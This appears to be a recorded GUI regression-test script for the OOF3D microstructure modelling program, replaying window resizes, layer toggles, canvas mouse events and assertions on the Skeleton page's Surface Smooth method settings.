checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.New
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Hide
checkpoint OOF.File.Load.Script
widget_0=findWidget('OOF3D Activity Viewer')
handled_0=widget_0.event(event(gtk.gdk.DELETE,window=widget_0.window))
postpone if not handled_0: widget_0.destroy()
checkpoint OOF.ActivityViewer.File.Close
#Going to the Skeleton Page
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Skeleton')
checkpoint page installed Skeleton
findWidget('OOF3D').resize(601, 357)
findWidget('OOF3D:Skeleton Page:Pane').set_position(250)
checkpoint skeleton page sensitized
checkpoint skeleton page info updated
checkpoint skeleton page info updated
checkpoint skeleton page sensitized
#Selecting the Microstrure '0color'
setComboBox(findWidget('OOF3D:Skeleton Page:Microstructure'), '0color')
checkpoint skeleton page info updated
checkpoint skeleton page info updated
checkpoint skeleton page sensitized
findWidget('OOF3D Graphics 1').resize(1000, 802)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 707))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 707))
findWidget('OOF3D Graphics 1').resize(1000, 806)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 711))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 711))
findWidget('OOF3D Graphics 1').resize(1000, 832)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 737))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 737))
findWidget('OOF3D Graphics 1').resize(1000, 857)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 762))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 762))
findWidget('OOF3D Graphics 1').resize(1000, 873)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 778))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 778))
findWidget('OOF3D Graphics 1').resize(1000, 883)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 788))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 788))
findWidget('OOF3D Graphics 1').resize(1000, 894)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 799))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 799))
findWidget('OOF3D Graphics 1').resize(1000, 897)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 802))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 802))
findWidget('OOF3D Graphics 1').resize(1000, 901)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 806))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 806))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 805))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 805))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 801))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 801))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 793))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 793))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 784))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 784))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 776))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 776))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 770))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 770))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 763))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 763))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 756))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 756))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 750))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 750))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 745))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 745))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 739))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 739))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 736))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 736))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 724))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 724))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 715))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 715))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 709))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 709))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 704))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 704))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 697))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 697))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 691))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 691))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 687))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 687))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 683))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 683))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 682))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 682))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 681))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 681))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 680))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 680))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 679))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.7979576943884e+01)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 5.5959153887769e+01)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 8.3938730831653e+01)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.1191830777554e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.3989788471942e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.6787746166331e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 1.9585703860719e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.2383661555107e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.5181619249496e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 2.7979576943884e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 3.0777534638273e+02)
findWidget('OOF3D Graphics 1:Pane0:LayerScroll').get_vadjustment().set_value( 3.3200000000000e+02)
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '29')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((29,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Hide
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '28')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((28,))
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
findCellRenderer(findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList'), col=0, rend=0).emit('toggled', '24')
findWidget('OOF3D Graphics 1:Pane0:LayerScroll:LayerList').get_selection().select_path((24,))
checkpoint Move Node toolbox writable changed
checkpoint Move Node toolbox info updated
checkpoint Graphics_1 Move Nodes sensitized
checkpoint Graphics_1 Voxel Info updated
checkpoint Graphics_1 Pin Nodes updated
checkpoint OOF.Graphics_1.Layer.Select
checkpoint OOF.Graphics_1.Layer.Show
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.8600000000000e+02,y= 2.0100000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8600000000000e+02,y= 2.0200000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8700000000000e+02,y= 2.0300000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8800000000000e+02,y= 2.0400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.8900000000000e+02,y= 2.0600000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.9200000000000e+02,y= 2.0800000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.9700000000000e+02,y= 2.1300000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 1.9900000000000e+02,y= 2.1400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 2.0000000000000e+02,y= 2.1500000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 2.0300000000000e+02,y= 2.1500000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 645)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 2.0500000000000e+02,y= 2.1700000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D Graphics 1:Pane0:Pane2:fill').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 679))
findWidget('OOF3D').resize(601, 357)
#Selecting the Surface Smooth method
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Chooser'), 'Surface Smooth')
assert tests.skeletonPageModificationSensitivityCheck1()
assert tests.skeletonMethodListCheck('Refine','Snap Nodes','Anneal','Smooth','Surface Smooth','Rationalize','Fix Illegal Elements','Snap Refine',)
assert tests.currentSkeletonMethodCheck('Surface Smooth')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D').resize(601, 401)
findWidget('OOF3D:Skeleton Page:Pane').set_position(274)
checkpoint skeleton page sensitized
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Unconditional')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Unconditional')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Either')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Either')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Acceptance Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Fixed Iterations')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Fixed Iterations')
findWidget('OOF3D:Skeleton Page:Pane').set_position(285)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:criterion:Chooser'), 'Average Energy')
assert tests.skeletonMethodCriterionListCheck('Surface Smooth','Average Energy','Unconditional')
assert tests.currentSkeletonMethodCriterionCheck('Surface Smooth','Average Energy')
findWidget('OOF3D:Skeleton Page:Pane').set_position(230)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Chooser'), 'Conditional Iteration')
assert tests.skeletonMethodIterationListCheck('Surface Smooth','Fixed Iterations','Conditional Iteration')
assert tests.currentSkeletonMethodIterationCheck('Surface Smooth','Conditional Iteration')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Acceptance Rate')
findWidget('OOF3D').resize(612, 475)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Energy Reduction Rate')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Energy Reduction Rate')
findWidget('OOF3D:Skeleton Page:Pane').set_position(123)
setComboBox(findWidget('OOF3D:Skeleton Page:Pane:Modification:Method:Surface Smooth:iteration:Conditional Iteration:condition:Chooser'), 'Both')
assert tests.skeletonMethodIterationConditionListCheck('Surface Smooth','Conditional Iteration','Acceptance Rate','Energy Reduction Rate','Both','Either',)
assert tests.currentSkeletonMethodIterationConditionCheck('Surface Smooth','Conditional Iteration','Both')
findWidget('OOF3D').resize(612, 497)
findWidget('OOF3D:Skeleton Page:Pane').set_position(110)
